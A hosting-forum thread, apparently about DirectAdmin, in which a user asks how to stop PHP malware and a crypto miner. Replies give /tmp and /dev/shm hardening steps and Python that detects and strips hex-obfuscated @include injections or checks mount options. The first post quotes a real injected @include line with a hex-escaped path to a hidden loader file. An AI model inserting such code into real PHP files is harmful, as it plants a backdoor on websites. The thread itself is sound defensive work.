How to block malware/crypto?

DaveMaster (Verified User, joined May 31, 2016, 15 messages)
Hi,

I have a lot of malware on a server with DA.

Example:
PHP:
/*a34c6*/

@include "\x2fh\x6fm\x65/\x66a\x73t\x77a\x6ci\x63h\x2fd\x6fm\x61i\x6es\x2fd\x65s\x6bi\x65g\x7ao\x74y\x63z\x6ee\x2ee\x75/\x70u\x62l\x69c\x5fh\x74m\x6c/\x6do\x64u\x6ce\x73/\x70h\x7aa\x75f\x61n\x65o\x70i\x6ei\x65/\x75p\x67r\x61d\x65/\x66a\x76i\x63o\x6e_\x634\x63b\x328\x2ei\x63o";

/*a34c6*/

or other files with hashes.

In /tmp/ there are files named "phpas2sad986f_3987fg" - this is a crypto mining script.

How can I block this on this server in the future?
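The injected block above has a fixed shape: a short hex tag in a comment, an @include whose path is written with PHP \xHH escapes so it does not show up when you grep for a path, and the same tag closing the block. The Python below is an added example, not code from the original post and not part of DirectAdmin or maldet. It decodes PHP double-quoted string escapes, finds blocks of that shape, and strips them while leaving the rest of the file intact. The sample PHP file and the path it includes are constructed here; the real path in the post is not reproduced.

```python
import os
import re

# Constructed sample path; the real path in the post points into a customer's
# public_html and is not reproduced here.
SAMPLE_PATH = "/home/example/public_html/modules/shop/upgrade/favicon_0a1b2c.ico"


def php_hex_obfuscate(s):
    """Write every other character as a PHP \\xHH escape, the way the
    injected @include in the post is written. Used only to build the sample."""
    return "".join(c if i % 2 else "\\x%02x" % ord(c) for i, c in enumerate(s))


# Constructed PHP file: the injected block sits in front of the original code.
SAMPLE_SOURCE = (
    "<?php\n"
    "/*a34c6*/\n\n"
    '@include "%s";\n\n'
    "/*a34c6*/\n\n"
    "// original file content follows\n"
    'echo "hello";\n'
) % php_hex_obfuscate(SAMPLE_PATH)

# Escapes PHP interprets inside a double-quoted string.
PHP_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|u\{[0-9A-Fa-f]+\}|[nrtvef\\$"])')
SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
                  "f": "\f", "\\": "\\", "$": "$", '"': '"'}


def php_unescape(s):
    """Decode a PHP double-quoted string body (\\xHH, octal, \\u{...}, \\n ...)."""
    def one(m):
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        if esc[0] == "u":
            return chr(int(esc[2:-1], 16))
        if esc[0] in "01234567":
            return chr(int(esc, 8))
        return SIMPLE_ESCAPES[esc]
    return PHP_ESCAPE.sub(one, s)


# /*<tag>*/  @include "<escaped path>";  /*<same tag>*/
INJECTION = re.compile(
    r'/\*(?P<tag>[0-9a-f]{5,8})\*/\s*'
    r'@include\s*"(?P<path>(?:[^"\\]|\\.)*)"\s*;\s*'
    r'/\*(?P=tag)\*/\s*',
    re.S,
)


def find_injections(source):
    """Return one dict per injected block: its tag, the raw escaped path,
    the decoded path and the character span it occupies."""
    return [
        {"tag": m.group("tag"), "raw": m.group("path"),
         "decoded": php_unescape(m.group("path")), "span": m.span()}
        for m in INJECTION.finditer(source)
    ]


def clean_source(source):
    """Strip the injected block(s); return (cleaned source, decoded include paths).

    Everything else is left untouched, which is what you want when the file
    itself is legitimate and only its head was modified.
    """
    paths = [hit["decoded"] for hit in find_injections(source)]
    return INJECTION.sub("", source), paths


def scan_tree(root):
    """Walk a docroot and report injected includes without modifying anything."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".inc")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as f:
                hits = find_injections(f.read())
            for hit in hits:
                print(f"{full}: tag {hit['tag']} includes {hit['decoded']}")


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_SOURCE):
        print("tag", hit["tag"], "->", hit["decoded"])
    print(clean_source(SAMPLE_SOURCE)[0])
```

Run scan_tree on a docroot first to see what the includes point at; the decoded path is the dropper or backdoor file that also has to be removed, otherwise the next injection pass just re-adds the @include.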
 
Have you secured your /tmp and installed csf/lfd and Maldetect?

Because these files don't get there by themselves; they have to be put there via a leaky piece of software or a vulnerable script on a website or something.
 
I didn't have csf/lfd, but I have now installed csf.

I have maldetect, but without removing/moving files to quarantine.
Malware 440 I can remove. Files with malware 441 need to exist, but only the first line needs to be modified.

How can I secure /tmp?
 
Malware 440 I can remove. Files with malware 441 need to exist, but only the first line needs to be modified.
Sorry, I don't quite understand what you mean by this. You can configure in /usr/local/maldetect/conf.maldet to move to quarantine if a problem is found.

You can secure /tmp in a couple of ways. With the example below, which I use, you create a /tmp of 5 GB space.
Just to be sure I always create a separate /datmp directory with 777 so you won't get issues when backing up sites bigger than 5 GB. You can choose a name yourself and specify it in directadmin.conf so DA will look to that separate directory.

Back to my example of the normal (and all other) /tmp directories. I use this:
Code:
# create a file-backed filesystem image for /tmp (1024 * 5000000 bytes, about 5 GB)
dd if=/dev/zero of=/var/tmpMnt bs=1024 count=5000000
mkfs.ext4 -j /var/tmpMnt
cd /
# keep a copy of the current /tmp contents, empty /tmp, then mount the image over it
cp -a /tmp /tmp_backup
rm -rf /tmp/.??* /tmp/*
mount -o loop,noexec,nosuid,nodev,rw /var/tmpMnt /tmp
# sticky bit plus world-writable: the normal permissions for /tmp
chmod 1777 /tmp
cp -a /tmp_backup/.??* /tmp_backup/* /tmp/
rm -rf /tmp_backup
# make the mount permanent across reboots
echo "/var/tmpMnt   /tmp   ext4   loop,noexec,nosuid,nodev,rw   0   0" >> /etc/fstab
# point /var/tmp and /home/tmp at the hardened /tmp as well
cp -a /var/tmp/.??* /var/tmp/* /tmp
rm -rf /var/tmp
ln -s /tmp /var/tmp
cp -a /home/tmp/.??* /home/tmp/* /tmp
rm -rf /home/tmp
ln -s /tmp /home/tmp

Don't be worried if you get some "does not exist" notices when copying directories here, because some won't exist.

You then have to adjust your logrotate file. In /etc/cron.daily/logrotate add this line:
Code:
export TMPDIR=/var/spool/logrotate/tmp
then issue the command:
Code:
mkdir -p /var/spool/logrotate/tmp

It's best to also secure /dev/shm, which is easier:
in /etc/fstab change:
Code:
none /dev/shm tmpfs defaults,rw 0 0
to
Code:
none /dev/shm tmpfs defaults,nosuid,noexec,rw 0 0
then run the command:
Code:
mount -o remount /dev/shm

Just to be sure, reboot your server.
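After the steps above it is worth checking what is actually mounted rather than trusting /etc/fstab, because a typo in the fstab line or a mount that silently failed at boot leaves /tmp executable again. The Python below is an added example, not code from the post or from DirectAdmin. It parses /proc/mounts, finds the mount that backs each of /tmp, /var/tmp and /dev/shm by longest prefix, and reports which of noexec, nosuid and nodev are missing. The /proc/mounts excerpt embedded in it is constructed: it mirrors the fstab lines above, so /tmp passes, /dev/shm is reported as lacking nodev (the /dev/shm line above sets only nosuid and noexec), and a /var/tmp that still lives on the root filesystem is flagged as well.

```python
import os

REQUIRED = ("noexec", "nosuid", "nodev")
TARGETS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed /proc/mounts excerpt, not taken from a real host. It mirrors the
# fstab lines above: a loop-mounted /tmp with all three options, a /dev/shm
# with nosuid,noexec but no nodev, and no separate mount for /var/tmp.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/loop0 /tmp ext4 rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,noexec,relatime 0 0
"""


def parse_mounts(text):
    """Return [(mountpoint, fstype, set_of_options)] from /proc/mounts text."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        # /proc/mounts escapes spaces in paths as \040
        mountpoint = parts[1].replace("\\040", " ")
        mounts.append((mountpoint, parts[2], set(parts[3].split(","))))
    return mounts


def mount_for(path, mounts):
    """Longest-prefix match: the mount entry that actually backs `path`."""
    best = None
    for mountpoint, fstype, opts in mounts:
        prefix = mountpoint.rstrip("/") + "/"
        if path == mountpoint or path.startswith(prefix):
            if best is None or len(mountpoint) > len(best[0]):
                best = (mountpoint, fstype, opts)
    return best


def check_mounts(text, targets=TARGETS, required=REQUIRED):
    """Map each target path to (backing mountpoint, [missing options]).

    A target not backed by any mount at all gets (None, list(required)).
    """
    mounts = parse_mounts(text)
    report = {}
    for path in targets:
        entry = mount_for(path, mounts)
        if entry is None:
            report[path] = (None, list(required))
            continue
        mountpoint, _fstype, opts = entry
        report[path] = (mountpoint, [opt for opt in required if opt not in opts])
    return report


def main():
    # On a live host resolve symlinks first: the steps above turn /var/tmp and
    # /home/tmp into symlinks to /tmp, so the real directory is what matters.
    with open("/proc/mounts") as f:
        text = f.read()
    targets = [os.path.realpath(p) for p in TARGETS + ("/home/tmp",)]
    for path, (mountpoint, missing) in check_mounts(text, targets).items():
        status = "ok" if not missing else "MISSING " + ",".join(missing)
        print(f"{path:12} backed by {mountpoint or '(nothing)':10} {status}")


if __name__ == "__main__":
    main()
```

A path backed by "/" in the report means it has no mount of its own and inherits the root filesystem's options, which is exactly the state the symlink trick above is meant to remove.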
 